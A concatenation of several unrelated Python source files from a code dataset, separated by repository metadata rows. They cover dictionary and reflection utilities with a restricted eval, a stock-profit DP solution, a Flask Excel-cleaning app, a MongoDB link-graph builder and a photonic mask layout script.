ValueError: If a non-flat dict is supplied
Returns:
Map: The expanded mapping object of same type as 'obj'.
Example:
>>> d = {'a': 1, 'b': 2, 'c.ca': 1, 'c.cb': 2}
>>> expand_dict(d)
{'a': 1, 'b': 2, 'c': {'ca': 1, 'cb': 2}}
"""
if not isinstance(obj, Map):
raise TypeError("expand_dict works only on dict-like types", type(obj))
if dict_depth(obj) != 1:
raise ValueError(
"expand_dict works only on flat dict-like types, "
"got a mapping of depth: {}".format(dict_depth(obj))
)
def inner(obj):
accumulator = type(obj)()
for k, v in obj.items():
*head, last = k.split(sep)
_ = accumulator
# Create missing paths
for part in head:
if part not in _:
_[part] = type(obj)()
_ = _[part]
_[last] = v
return accumulator
return inner(obj)
def get_concrete_subclasses(klass, recursive: bool = True, derived: bool = True) -> t.List:
"""Get a list of non-abstract subclasses of a type
Args:
klass (t.Type): The type object
recursive (bool): Should the classes be extracted recursively? Defaults to True.
derived (bool): Use the 'derived' property of SubclassTracker-enhanced types? [True]
Returns:
t.List: A list of concrete subclasses of the type
"""
from exot.util.mixins import _SubclassTracker as __
if derived and hasattr(klass, __.concrete):
return list(getattr(klass, __.concrete))
subclasses = get_subclasses(klass, recursive=recursive)
return [k for k in subclasses if not isabstract(k)]
def get_subclasses(klass, recursive: bool = True, derived: bool = True) -> t.List:
"""Get a list of subclasses of a type
Args:
klass (t.Type): The type object
recursive (bool): Should the classes be extracted recursively? Defaults to True.
derived (bool): Use the 'derived' property of SubclassTracker-enhanced types? [True]
Returns:
t.List: A list of concrete subclasses of the type
"""
from exot.util.mixins import _SubclassTracker as __
if not (hasattr(klass, "__subclasses__") or hasattr(klass, __.derived)):
raise TypeError(f"__subclasses__ or {__.derived} attribute missing", klass)
if derived:
return list(getattr(klass, __.derived))
subclasses = klass.__subclasses__()
def walker(k):
first, *rest = k
if len(rest):
walker(rest)
if first not in subclasses:
subclasses.append(first)
if hasattr(first, "__subclasses__"):
_ = first.__subclasses__()
if len(_):
walker(_)
if recursive:
walker(subclasses)
return subclasses
def get_valid_access_paths(
obj: Map,
_limit: int = 8192,
_leaf_only: bool = False,
_use_lists: bool = True,
_fallthrough_empty: bool = True,
) -> t.Generator[t.Tuple, None, None]:
"""Generate valid key sequences in a dict, optionally including lists
Args:
obj (Map): The dict-like object
_limit (int): Maximum number of paths that can be created with list-like elements.
_leaf_only (bool): Provide paths for only the leaves of the mapping. Defaults to True.
_use_lists (bool): Provide paths for list-like elements in the mapping. Defaults to True.
_fallthrough_empty (bool): Discard empty list- or dict-like elements? Defaults to True.
Details:
If `_leaf_only` is set, only paths to leaves will be produced, a leaf being a value
that is not a mapping (or list).
If `_use_lists` is set, lists will also be *recursively* checked for valid paths.
if `_fallthrough_empty` is set, an empty dict or list will yield an empty tuple,
rendering a parent path.
Returns:
t.Generator[t.Tuple,None,None]: A generator that yields the access paths (tuples).
Examples:
>>> # Only leaves:
>>> d = {'a1': {'a2': None}, 'b2': None}
>>> list(get_valid_access_paths(d, _leaf_only=True))
[('a1', 'a2'), ('b2',)]
>>> # All paths:
>>> list(get_valid_access_paths(d, _leaf_only=False))
[('a1',), ('a1', 'a2'), ('b2',)]
"""
def thrower(o: object, t: type, n: str) -> t.NoReturn:
if not isinstance(o, t):
raise TypeError(
f"get_valid_access_paths expected {t!r} for {n!r}, got: {type(o)!r}"
)
thrower(obj, Map, "obj")
thrower(_limit, int, "_limit")
thrower(_leaf_only, bool, "_leaf_only")
thrower(_use_lists, bool, "_use_lists")
thrower(_fallthrough_empty, bool, "_fallthrough_empty")
def inner(obj: t.Union[Map, t.List, t.Set]) -> t.Generator:
if _fallthrough_empty and not obj:
yield tuple()
# if obj is a mapping
if isinstance(obj, Map):
for k, v in obj.items():
# if the value in obj is also a mapping...
if isinstance(v, Map):
if not _leaf_only:
yield (k,)
# ... make a recursive call
for vv in inner(v):
yield (k,) + vv
# if the value in obj is a list...
elif _use_lists and isinstance(v, (t.List, t.Set)):
# ... first yield the valid path to the key containing the list
if v and not _leaf_only:
yield (k,)
elif not v and _fallthrough_empty:
yield (k,)
# ... loop through elements, and keep track of indexes
for idx, vv in enumerate(v):
# if an element is also a mapping or list...
if isinstance(vv, (Map, (t.List, t.Set))):
# ... make a recursive call
for vvv in inner(vv):
yield (k,) + (idx,) + vvv
else:
# ... otherwise yield keypath + idx
yield (k,) + (idx,)
# if the value is neither a mapping nor a list, yield the key
else:
yield (k,)
# if obj is a list-like sequence
if _use_lists and isinstance(obj, (t.List, t.Set)):
# might be tricky to generate valid sequences for large lists!
if _limit and len(obj) >= _limit:
raise ValueError(
f"get_key_sequences list limit of {_limit} exceeded: {len(obj)}"
)
for idx, v in enumerate(obj):
if isinstance(v, (Map, (t.List, t.Set))):
for vv in inner(v):
yield (idx,) + vv
else:
yield (idx,)
return inner(obj)
def getitem(obj: Map, query: t.Union[str, t.Tuple], *args: t.Any, sep: str = "/") -> t.Any:
"""Get a value from a dict-like object using an XPath-like query, or a tuple-path
Accesses an object that provides a dict-like interface using a query: either a
tuple representing the path, or a string where consecutive keys are separated with
a separator, e.g. "key1/key2".
Returns the value of the object at the given key-sequence. Returns a default value
if provided, or throws a LookupError.
Args:
obj (Map): a mapping
query (t.Union[str, t.Tuple]): a query path using a separated string or a tuple
*args (t.Any): an optional default value, similar to `getattr`
sep (str, optional): a separator string used to split a string query path
Returns:
t.Any: the value stored in obj for the given query, or the default value
Raises:
LookupError: if query not found and no default value is provided
TypeError: if obj is not a mapping, or query is not a str or tuple
"""
if not isinstance(obj, Map):
raise TypeError("'obj' must be an instance of Mapping, e.g. dict", type(obj))
if not isinstance(query, (str, t.Tuple)):
raise TypeError("'query' must be a str or a tuple", type(query))
if len(args) > 1:
raise TypeError(f"getitem accepts at most 3 positional args, got {len(args)}")
_obj = obj
# handler for tuple queries
if isinstance(query, t.Tuple):
_valid = get_valid_access_paths(obj)
if query not in _valid:
if args:
return args[0]
else:
raise LookupError(f"query {query!r} not found")
else:
for node in query:
_obj = _obj[node]
return _obj
# handler for string queries
else:
try:
# loop through components in the query, consecutively accessing the mapping
for node in query.split(sep):
# handle empty nodes in the query, e.g. when query="a///b" -> "a/b"
if not node:
continue
if isinstance(_obj, Map):
for k in _obj.keys():
node = type(k)(node) if str(k) == node else node
elif isinstance(_obj, (t.List, t.Set)):
try:
node = int(node)
except TypeError:
raise LookupError(
f"{node} not convertible to int when attempting to access "
f"a list {_obj!r}"
)
_obj = _obj[node]
return _obj
except LookupError as Error:
if args:
return args[0]
else:
Error.args += (query,)
raise
def has_method(klass: t.Union[type, object], name: str) -> bool:
"""Check if a method exists in any of a klass'es bases
Args:
klass (t.Union[type, object]): The type or object
name (str): The name of the method
Returns:
bool: True if has a method with the given name.
"""
candidates = find_attributes(klass, name)
if not candidates:
return False
def is_callable(c):
return isinstance(getattr(klass, str(c), None), t.Callable)
return all(is_callable(f) for f in candidates)
def has_property(klass: t.Union[type, object], name: str) -> bool:
"""Check if a variable exists in any of a klass'es bases
Args:
klass (t.Union[type, object]): The type or object
name (str): The name of the property
Returns:
bool: True if has a property with the given name.
"""
candidates = find_attributes(klass, name)
if not candidates:
return False
def is_property(c):
return not isinstance(getattr(klass, str(c), None), property)
return all(is_property(f) for f in candidates)
def has_type(klass: t.Union[type, object]) -> bool:
"""Check if a type or instance has a Type member type that derives from Enum
Args:
klass (t.Union[type, object]): The type or object
Returns:
bool: True if has the "Type" attribute.
"""
if not isinstance(klass, (type, object)):
raise TypeError(klass)
return issubclass(getattr(klass, "Type", type(None)), Enum)
def has_variable(klass: t.Union[type, object], name: str) -> bool:
"""Check if a variable exists in any of a klass'es bases
Args:
klass (t.Union[type, object]): The type or object
name (str): The name of the variable
Returns:
bool: True if has a variable with the given name.
"""
candidates = find_attributes(klass, name)
if not candidates:
return False
def is_not_callable(c):
return not isinstance(getattr(klass, str(c), None), t.Callable)
return all(is_not_callable(f) for f in candidates)
def is_abstract(klass: t.Union[type, object]) -> bool:
"""Check if a type or instance is abstract
Args:
klass (t.Union[type, object]): The type or object
Returns:
bool: True if the type/instance is abstract.
"""
if not isinstance(klass, (type, object)):
raise TypeError(klass)
if hasattr(klass, "__abstractmethods__"):
return 0 != len(getattr(klass, "__abstractmethods__"))
else:
from inspect import isabstract
return isabstract(klass)
def is_scalar_numeric(value: t.Any) -> bool:
"""Check if is an int, a float, or a NumPy variant thereof
Args:
value (t.Any): The value to inspect
Returns:
bool: True if scalar and numeric.
"""
return isinstance(value, (float, int, np.integer, np.floating))
def leaves(obj: Map) -> t.Generator:
"""Get leaves of a mapping
Args:
obj (Map): The dict-like object
Returns:
t.Generator: A generator that yields the leaf elements of the mapping.
"""
paths = get_valid_access_paths(obj, _leaf_only=True, _use_lists=False)
return (getitem(obj, path) for path in paths)
def list2cmdline(seq: t.Iterable) -> str:
"""Translates a sequence of arguments into a command line string with "None" removal
Args:
seq (t.Iterable): The sequence of arguments
Returns:
str: The command-line string
"""
seq = [_ for _ in seq if _ is not None]
return _list2cmdline(seq)
def map_to_leaves(function: t.Callable[[t.Any], t.Any], obj: t.T, _seq: bool = True) -> t.Any:
"""Map a function to leaves of an object
A leaf is considered to be an object that is not a Mapping (or, when _seq is set,
also not a Sequence except a string, which is also a Sequence).
Args:
function (t.Callable[[t.Any], t.Any]): a function or signatude "a -> a"
obj (t.T): a dict-like, list-like, or plain object
_seq (bool, optional): map on elements of lists?
Returns:
t.T: the obj with transformed elements
"""
def inner(obj: t.T) -> t.Any:
if isinstance(obj, Map):
return type(obj)({k: inner(v) for k, v in obj.items()})
elif _seq and isinstance(obj, (t.List, t.Set)):
return type(obj)(inner(v) for v in obj)
else:
return function(obj)
return inner(obj)
def mro_getattr(cls: type, attr: str, *args: t.Any) -> t.Any:
"""Get an attribute from a type's class hierarchy
Args:
cls (type): The type
attr (str): The attribute
*args (t.Any): The default value (like in Python's default getattr)
Returns:
t.Any: The attribute, or when not found the default value (if provided)
Raises:
TypeError: Not called on a type
TypeError: Wrong number of arguments
AttributeError: Attribute not found and no default value provided
"""
if not isinstance(cls, type):
raise TypeError(f"mro_getattr can only be used on types, got {type(cls)}")
if len(args) > 1:
raise TypeError(f"mro_getattr expected at most 3 arguments, got {2 + len(args)}")
for klass in cls.mro()[1:]:
if hasattr(klass, attr):
# return first matching attribute
return getattr(klass, attr)
if args:
# if provided, return args[0], i.e. the a default value
return args[0]
else:
raise AttributeError(f"type object {cls.__name__!r} has not attribute {attr!r}")
def mro_hasattr(cls: type, attr: str) -> bool:
"""Check if an attribute exists in a type's class hierarchy
Args:
cls (type): The type
attr (str): The attribute
Returns:
bool: True if has the attribute.
Raises:
TypeError: Not called on a type
"""
if not isinstance(cls, type):
raise TypeError(f"mro_getattr can only be used on types, got {type(cls)}")
for klass in cls.mro()[1:]:
if hasattr(klass, attr):
return True
return False
def random_string(length: int) -> str:
"""Make a random string of specified length
Args:
length (int): The desired random string length
Returns:
str: The random string
"""
assert isinstance(length, int), f"'length' must be an int, got: {type(length)}"
return "".join(random.choices(ascii_letters, k=length))
def timestamp() -> str:
"""Make a timestamp with current time
Returns:
str: The timestamp in ISO format
"""
return datetime.now().isoformat("_", timespec="seconds").replace(":", "-")
def safe_eval(
to_eval: str, *, expect: t.Tuple[type] = (list, np.ndarray), timeout: int = 10
) -> object:
"""Evaluate a restricted subset of Python (and numpy) from a string
Args:
to_eval (str): The string to evaluate
expect (t.Tuple[type]): The list of expected resulting types. Defaults to list, ndarray.
timeout (int): The timeout after which the call fails in seconds. Defaults to 10.
The `safe_eval` function allows using a subset of commands, listed in `_globals` and
`_locals`, which includes a few numpy functions: linspace, arange, array, rand, and
randint. Examples:
>>> safe_eval("linspace(1, 10, 10, dtype=int).tolist()")
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
>>> safe_eval("__import__('os').getcwd()")
NameError Traceback (most recent call last)
...
NameError: name '__import__' is not defined
>>> safe_eval("range(5)")
TypeError Traceback (most recent call last)
...
TypeError: eval produced a <class 'range'>, expected: (<class 'list'>, <class 'numpy.ndarray'>)
>>> safe_eval("list(round(rand(), 2) for _ in range(5))")
[0.96, 0.41, 0.9, 0.98, 0.02]
"""
assert isinstance(to_eval, str), "'to_eval' must be a str"
assert isinstance(expect, tuple), "'expect' must be a tuple"
assert all(isinstance(_, type) for _ in expect), "'expect' must contain only types"
_locals = {}
_globals = {
"__builtins__": {},
"list": list,
"range": range,
"len": len,
"int": int,
"float": float,
"min": min,
"max": max,
"round": round,
"linspace": np.linspace,
"geomspace": np.geomspace,
"logspace": np.logspace,
"hstack": np.hstack,
"vstack": np.vstack,
"split": np.split,
"arange": np.arange,
"array": np.array,
"rand": np.random.rand,
"randint": np.random.randint,
}
class AlarmException(Exception):
pass
def signal_handler(number: int, frame):
assert number == signal.SIGALRM.value
raise AlarmException()
signal.signal(signal.SIGALRM, signal_handler)
signal.alarm(timeout)
try:
_ = eval(to_eval, _globals, _locals)
except AlarmException:
raise TimeoutError(f"safe_eval took longer than {timeout} seconds")
else:
signal.signal(signal.SIGALRM, signal.SIG_IGN)
signal.alarm(0)
if not isinstance(_, expect):
raise EvalTypeError(f"eval produced a {type(_)}, expected: {expect}")
return _
def sanitise_ansi(value: t.Union[t.List[str], str]) -> t.Union[t.List[str], str]:
"""Remove all ANSI escape characters from a str or a list of str
Args:
value (t.Union[t.List[str], str]): The string or list of strings
Returns:
t.Union[t.List[str], str]: The sanitised string or a list of sanitised strings
"""
_ansi_escape = re.compile(r"(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]")
if isinstance(value, str):
return _ansi_escape.sub("", value)
elif isinstance(value, t.List):
return list(map(lambda x: _ansi_escape.sub("", x).strip(), value))
else:
raise TypeError("sanitise_ansi accepts only str or lists of str")
def setgetattr(klass: t.Union[type, object], attr: str, default: t.Any) -> None:
"""Combines `setattr` and `getattr` to set attributes
Args:
klass (t.Union[type, object]): The type or object
attr (str): The attribute
default (t.Any): The default value
"""
if not any([isinstance(klass, type), isinstance(klass, object)]):
raise TypeError("'klass' should be a type or an object", klass)
if not isinstance(attr, str):
raise TypeError("'attr' should be a str")
if not attr:
raise ValueError("'attr' should not be empty")
setattr(klass, attr, getattr(klass, attr, default))
def setitem(obj: t.MutableMapping, query: t.Tuple, value: t.Any, force: bool = False) -> None:
"""Set a value in a dict-like object using a tuple-path query
Args:
obj (t.MutableMapping): a mutable mapping
query (t.Tuple): a query path as a tuple
value (t.Any): value to set
Raises:
TypeError: if obj is not a mutable mapping
"""
if not isinstance(obj, t.MutableMapping):
raise TypeError("'obj' needs to be a mutable mapping", type(obj))
_obj = obj
_valid = get_valid_access_paths(obj)
if query not in _valid:
if not force:
raise KeyError(f"query-path {query!r} not found")
else:
for node in query[:-1]:
if node not in _obj:
_obj = dict()
_obj = _obj[node]
else:
for node in query[:-1]:
_obj = _obj[node]
_obj[query[-1]] = value
def stub_recursively(
obj: t.T, stub: t.Any = None, _stub_list_elements: bool = True
) -> t.Optional[t.T]:
"""Produce a copy with all leaf values recursively set to a 'stub' value
Args:
obj (t.T): the object to stub
stub (t.Any, optional): the value to set the leaf elements to
_stub_list_elements (bool, optional): stub individual elements in collections?
Returns:
(t.T, optional): the stubbed object
"""
def inner(obj):
if isinstance(obj, Map):
return type(obj)((k, inner(v)) for k, v in obj.items())
elif _stub_list_elements and isinstance(obj, (t.List, t.Set)):
return type(obj)(inner(v) for v in obj)
else:
return stub
return inner(obj)
def unpack__all__(*imports: t.Collection[str]) -> t.Tuple[str]:
"""Upacks a list of lists/tuples into a 1-dimensional list
Args:
*imports (t.Collection[str]): The collections of strings in "__all__"
Returns:
t.Tuple[str]: The flattened imports as a tuple of strings.
"""
from itertools import chain
_name = f"{__name__}.unpack__all__"
if not all(isinstance(e, (t.List, t.Tuple)) for e in imports):
raise TypeError(f"{_name}: arguments should be lists or tuples")
_ = chain(*imports)
assert all(
issubclass(type(e), str) for e in _
), f"{_name}: values in unpacked containers were not scalar or 'str'"
return tuple(_)
def validate_helper(what: t.Mapping, key: t.Any, *types: type, msg: str = "") -> t.NoReturn:
"""Validate types of key in a mapping using key-paths
Args:
what (t.Mapping): The mapping
key (t.Any): The key
*types (type): The valid types
msg (str): An additional error message. Defaults to "".
"""
if not isinstance(what, t.Mapping):
raise TypeError(f"validate_helper works only on mappings, got {type(what)}")
if not types:
raise TypeError(f"validate helper expects at least 1 'types' argument")
if isinstance(key, str) or not isinstance(key, t.Iterable):
key = tuple([key])
elif not isinstance(key, tuple):
key = tuple(key)
# The `config` property setter guarantees that `config` is a fully
# mutated AttributeDict, therefore :meth:`getattr` can be used.
if not isinstance(getitem(what, key, None), types):
raise MisconfiguredError(
"{0}config key: '{1!s}' should be of type {2!r}, got {3!s}".format(
f"{msg} " if msg else "", key, types, type(getitem(what, key, None))
)
)
def get_cores_and_schedules(environments_apps_zones: t.Mapping) -> set:
e_a_z = environments_apps_zones
_cores_and_schedules = set()
for env in e_a_z:
for app in e_a_z[env]:
if app != "src":
continue
_path_to_cores = ("app_config", "generator", "cores")
_path_to_schedule_tag = ("zone_config", "schedule_tag")
access_paths = list(get_valid_access_paths(e_a_z[env][app]))
if _path_to_cores not in access_paths:
raise LayerMisconfigured(
f"{env!r}->{app!r} must have a 'generator.cores' config key"
)
if _path_to_schedule_tag not in access_paths:
_ = e_a_z[env][app]["zone"]
raise LayerMisconfigured(
f"{env!r}.{_!r} of app {app!r} must have a schedule_tag"
)
_cores_and_schedules.add(
(
len(getitem(e_a_z[env][app], _path_to_cores)),
getitem(e_a_z[env][app], _path_to_schedule_tag),
)
)
return _cores_and_schedules
| 33.755825 | 158 | 0.592601 | 45 | 0.001242 | 4,126 | 0.113915 | 0 | 0 | 0 | 0 | 20,444 | 0.56444 |
9ede197b4e22a537f288d32a4de554ea29c1ea06 | 1,222 | py | Python | 70_question/dynamic_programming/max_profit_with_k_transactions.py | alvinctk/google-tech-dev-guide | 9d7759bea1f44673c2de4f25a94b27368928a59f | [
"Apache-2.0"
]
| 26 | 2019-06-07T05:29:47.000Z | 2022-03-19T15:32:27.000Z | 70_question/dynamic_programming/max_profit_with_k_transactions.py | alvinctk/google-tech-dev-guide | 9d7759bea1f44673c2de4f25a94b27368928a59f | [
"Apache-2.0"
]
| null | null | null | 70_question/dynamic_programming/max_profit_with_k_transactions.py | alvinctk/google-tech-dev-guide | 9d7759bea1f44673c2de4f25a94b27368928a59f | [
"Apache-2.0"
]
| 6 | 2019-10-10T06:39:28.000Z | 2020-05-12T19:50:55.000Z | def maxProfitWithKTransactions(prices, k):
n = len(prices)
profit = [[0]*n for _ in range(k+1)]
"""
t := number of transactions
d := day at which either buy/sell stock
profit[t][d] = max ( previous day profit = profit[t][d-1] ,
profit sold at this day + max(buy for this transaction + profit at last transaction)
prices[d] + max(-prices[x] + profit[t-1][x], where 0 <= x < d)
"""
if not prices:
return 0
for t in range(1, k+1):
for d in range(1, n):
previous_day_profit = profit[t][d-1]
max_profit_buy_on_t = float("-inf")
for x in range(0, d):
max_profit_buy_on_t = max(max_profit_buy_on_t, -prices[x] + profit[t-1][x])
profit[t][d] = max(previous_day_profit, prices[d] + max_profit_buy_on_t)
debug = False
if debug:
print(prices)
for row in profit:
print(row)
print("Maximum profit for k={} transaction for {} stock prices at each day = {}".format(k, prices, profit[-1][-1] if profit else 0))
return profit[-1][-1]
if __name__ == "__main__":
maxProfitWithKTransactions([5, 11, 3, 50, 60, 90], 2)
| 31.333333 | 136 | 0.56383 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 441 | 0.360884 |
9edf6ecb3d424f1fd6e8e155154f4ecebc700938 | 4,149 | py | Python | main.py | rdmaulana/flask-smart-xls-clean | 8dde5b56c241312ab252964b159921acd6013839 | [
"MIT"
]
| null | null | null | main.py | rdmaulana/flask-smart-xls-clean | 8dde5b56c241312ab252964b159921acd6013839 | [
"MIT"
]
| null | null | null | main.py | rdmaulana/flask-smart-xls-clean | 8dde5b56c241312ab252964b159921acd6013839 | [
"MIT"
]
| null | null | null | import pandas as pd
import numpy as np
import io
import time
import uuid
from flask import Flask, render_template, request, redirect, url_for, Response, session, send_file, make_response, send_from_directory
from os.path import join, dirname, realpath
from werkzeug.wsgi import FileWrapper
app = Flask(__name__)
app.config["DEBUG"] = True
app.config["UPLOAD_FOLDER"] = 'media/dataset'
app.config["EXPORT_FOLDER_CSV"] = 'media/result'
app.config["SECRET_KEY"] = 'DBA2823#*@$&bdaiuwgdbi8238XBxjzhx@$@'
app.config['SESSION_TYPE'] = 'filesystem'
@app.route('/')
def index():
return render_template('index.html')
@app.route("/", methods=['POST'])
def uploadExcel():
start_id = request.form['id']
uploaded_file = request.files['file']
if uploaded_file.filename != '':
file_path = join(app.config['UPLOAD_FOLDER'], uploaded_file.filename)
uploaded_file.save(file_path)
cleanExcel(file_path, start_id)
csv_name = session['csv_name']
return redirect(url_for('success', file_id=csv_name))
else:
return redirect(url_for('index'))
@app.route('/export/<file_id>', methods=['GET','POST'])
def success(file_id):
filename = session['csv_name'] if "csv_name" in session else ""
return render_template('success.html', filename=file_id)
@app.route('/downloads/<path:filename>', methods=['GET','POST'])
def download(filename):
uploads = join(app.root_path, app.config['EXPORT_FOLDER_CSV'])
return send_from_directory(directory=uploads, filename=filename)
def cleanExcel(file_path, start_id):
xls = pd.read_excel(file_path)
xls.replace(to_replace=[r"\\t|\\n|\\r", "\t|\n|\r"], value=["",""], regex=True)
print("Jumlah awal: {}".format(xls.shape))
xls.rename(columns = {
'NIK':'nik',
'NAMA':'nama',
'JENIS_KELAMIN':'jkel',
'TANGGAL_LAHIR':'tgl_lahir',
'NO_HP':'telp',
'INSTANSI_PEKERJAAN':'instansi',
'ALAMAT KTP': 'alamat',
'ALAMAT_KTP': 'alamat',
'KODE_KAB_KOTA_TEMPAT_KERJA': 'kab_id',
'KODE_KATEGORI': 'kategori'
}, inplace = True)
xls['nik'] = xls['nik'].astype(str)
xls.insert(0, 'id', range(int(start_id), int(start_id) + len(xls)))
xls.insert(2, 'nama_ktp', xls['nama'])
xls.insert(6, 'status', 0)
# del xls['NO']
del xls['UMUR']
del xls['JENIS_PEKERJAAN']
xls.drop(xls[xls['tgl_lahir'].isnull()].index, inplace = True)
xls.drop(xls[xls['nik'].isnull()].index, inplace = True)
xls.drop(xls[xls['nik'].str.len() > 16].index, inplace = True)
xls.drop(xls[xls['nik'].str.len() < 16].index, inplace = True)
xls.drop(xls[xls.duplicated(['nik'])].index, inplace = True)
if xls['tgl_lahir'].dtypes == 'object':
xls['tgl_lahir'] = pd.to_datetime(xls['tgl_lahir'])
if xls['telp'].dtypes == 'float64':
xls['telp'] = xls['telp'].astype(str)
xls['telp'] = xls['telp'].str.split('.').str[0]
xls['telp'] = xls['telp'].replace('nan',np.NaN)
xls['telp'] = '0' + xls['telp']
if xls['telp'].dtypes == 'object':
xls['telp'] = xls['telp'].str.split('/').str[0]
xls['telp'] = xls['telp'].str.replace('\+62','0')
xls['telp'] = xls['telp'].str.replace(' ','')
xls['telp'] = xls['telp'].str.replace('-','')
if xls['kab_id'].dtypes == 'float64':
xls['kab_id'] = xls['kab_id'].astype(str)
xls['kab_id'] = xls['kab_id'].str.split('.').str[0]
xls['kab_id'] = xls['kab_id'].replace('nan',np.NaN)
if xls['kategori'].dtypes == 'int64':
xls['kategori'] = xls['kategori'].astype(str)
xls['kategori'] = xls['kategori'].apply(lambda x: '0' + x if len(x) == 1 else x)
xls['alamat'] = xls['alamat'].replace(';','')
print("Jumlah akhir: {}".format(xls.shape))
uid = str(uuid.uuid4())[:4]
path_file = 'media/result/'
outfile_name = '{0}{1}'.format(time.strftime("%Y%m%d-%H%M%S-"),uid)
session['csv_name'] = f'{outfile_name}'
xls.to_csv(f'{path_file}{outfile_name}.csv', index=False, header=True, encoding="utf-8")
if __name__ == '__main__':
app.run(debug=True) | 35.161017 | 134 | 0.612919 | 0 | 0 | 0 | 0 | 976 | 0.235237 | 0 | 0 | 1,198 | 0.288744 |
9edfa90d3388411fff4970296751427f8a1b76b6 | 257 | py | Python | 2_UNIXCommands/Exercise11.py | takeyoshinitta/NLP-100-Exercise | e77fb385fbbf50c8a8bdc47442db1421739ea5b6 | [
"MIT"
]
| 3 | 2022-01-04T19:02:22.000Z | 2022-02-21T08:52:18.000Z | 2_UNIXCommands/Exercise11.py | takeyoshinitta/NLP-100-Exercise | e77fb385fbbf50c8a8bdc47442db1421739ea5b6 | [
"MIT"
]
| null | null | null | 2_UNIXCommands/Exercise11.py | takeyoshinitta/NLP-100-Exercise | e77fb385fbbf50c8a8bdc47442db1421739ea5b6 | [
"MIT"
]
| null | null | null | # 11. Replace tabs into spaces
# Replace every occurrence of a tab character into a space. Confirm the result by using sed, tr, or expand command.
with open('popular-names.txt') as f:
for line in f:
print(line.strip().replace("\t", " "))
| 36.714286 | 116 | 0.66537 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 173 | 0.673152 |
9edfcae85303a4e73d41bdae85aeda75e4c87673 | 2,817 | py | Python | scripts/wapo/wapo_link_graph_from_mongo.py | feup-infolab/army-ant | 7b33120d5160f73d7a41a05e6336489c917fb75c | [
"BSD-3-Clause"
]
| 5 | 2018-01-18T14:11:52.000Z | 2020-10-23T16:02:25.000Z | scripts/wapo/wapo_link_graph_from_mongo.py | feup-infolab/army-ant | 7b33120d5160f73d7a41a05e6336489c917fb75c | [
"BSD-3-Clause"
]
| 10 | 2018-02-02T20:19:36.000Z | 2020-10-05T08:46:36.000Z | scripts/wapo/wapo_link_graph_from_mongo.py | feup-infolab/army-ant | 7b33120d5160f73d7a41a05e6336489c917fb75c | [
"BSD-3-Clause"
]
| null | null | null | #!/usr/bin/env python
#
# wapo_link_graph_from_mongo.py
# José Devezas <[email protected]>
# 2019-02-05
import logging
import sys
import warnings
import networkx as nx
from bs4 import BeautifulSoup
from pymongo import MongoClient
logging.basicConfig(
format='%(asctime)s wapo_link_graph_from_mongo: %(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO)
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) < 3:
print("Usage: %s MONGO_DBNAME OUTPUT_GRAPH_PATH" % sys.argv[0])
sys.exit(1)
database = sys.argv[1]
output_graph_path = sys.argv[2]
mongo = MongoClient()
db = mongo[database]
def document_iterator():
for doc in db.articles.find():
yield doc
for doc in db.blog_posts.find():
yield doc
logging.info("Extracting anchors from content elements (using article_url as node ID) and building graph")
g = nx.DiGraph()
doc_count = 0
edge_count = 0
attr_keys = ['id', 'title', 'article_url', 'published_date', 'author', 'type']
for source in document_iterator():
if not 'contents' in source or source.get('contents') is None:
continue
for par in source['contents']:
if par is None:
continue
html = par.get('content')
if html is None:
continue
html = str(html)
soup = BeautifulSoup(html, 'lxml')
anchors = soup.find_all('a')
for a in anchors:
target_url = a.attrs.get('href')
if target_url is None:
continue
query = {'article_url': target_url}
attr_selector = {
'_id': -1, 'id': 1, 'article_url': 1, 'title': 1,
'published_date': 1, 'author': 1, 'type': 1}
target = db.articles.find_one(query, attr_selector) \
or db.blog_posts.find_one(query, attr_selector)
if target is None:
continue
# graph[source_url].add(target_url)
g.add_node(
source['id'], **{k.replace('_', ''): source[k] for k in attr_keys if not source[k] is None})
g.add_node(
target['id'], **{k.replace('_', ''): target[k] for k in attr_keys if not target[k] is None})
g.add_edge(source['id'], target['id'])
edge_count += 1
doc_count += 1
if doc_count % 1000 == 0:
logging.info("%d documents processed (%d edges created)" % (doc_count, edge_count))
logging.info("%d documents processed (%d edges created)" % (doc_count, edge_count))
logging.info("Saving graph to %s" % output_graph_path)
if output_graph_path.endswith('.gml') or output_graph_path.endswith('.gml.gz'):
nx.write_gml(g, output_graph_path)
else:
nx.write_graphml(g, output_graph_path)
| 26.083333 | 108 | 0.615903 | 0 | 0 | 132 | 0.046842 | 0 | 0 | 0 | 0 | 704 | 0.249823 |
9ee566ce8a227cbd2a762122ce0690fc72e66ca6 | 7,540 | py | Python | designScripts/vernierMask.py | smartalecH/BYUqot | 5b24759c4a100086937795a80d2eb6597e611819 | [
"MIT"
]
| 5 | 2019-03-26T17:12:25.000Z | 2021-12-27T18:05:52.000Z | designScripts/vernierMask.py | smartalecH/BYUqot | 5b24759c4a100086937795a80d2eb6597e611819 | [
"MIT"
]
| 5 | 2018-05-30T21:05:36.000Z | 2018-08-16T05:16:40.000Z | designScripts/vernierMask.py | smartalecH/BYUqot | 5b24759c4a100086937795a80d2eb6597e611819 | [
"MIT"
]
| 5 | 2018-05-30T02:54:07.000Z | 2020-08-16T17:18:38.000Z | # ------------------------------------------------------------------ #
# vernierMask.py
# ------------------------------------------------------------------ #
#
# A mask design used to align the 3D printer to a silicon photonic chip
#
# ------------------------------------------------------------------ #
# VERSION HISTORY
# 10 Apr 2018 - AMH - Initialization
#
# ------------------------------------------------------------------ #
# ------------------------------------------------------------------ #
# Import libraries
# ------------------------------------------------------------------ #
# Get project library path to import library files
import sys
import os
d = os.path.dirname(os.getcwd())
libPath = os.path.abspath(os.path.join(d, 'lib'))
sys.path.insert(0, libPath)
# Import all other libraries
import gdspy
import numpy as np
import objectLibrary as obLib
# ------------------------------------------------------------------ #
# Design Constants
# ------------------------------------------------------------------ #
# Cell parameters
layerNumber = 1
# Vernier mask design parameters (all values in microns)
numFingers = 10 # Number of fingers to have on top and bottom
fingerWidth = 30 # Width of each finger
fingerSpacing = 40 # Spacing between fingers
longFingerLength = 200; # Length of the long, middle finger
shortFingerLength = 150; # Length of the short, outer fingers
baseThickness = 76; # Thickness of edge border of design
separationDistance = 380 # distance from edge of pattern to origin
buffer = 50 # Kerf width of blade
innerBoxWidth = 8.78e3 # Actual dimensions of chip
outerBoxWidth = innerBoxWidth + buffer # Buffered chip size
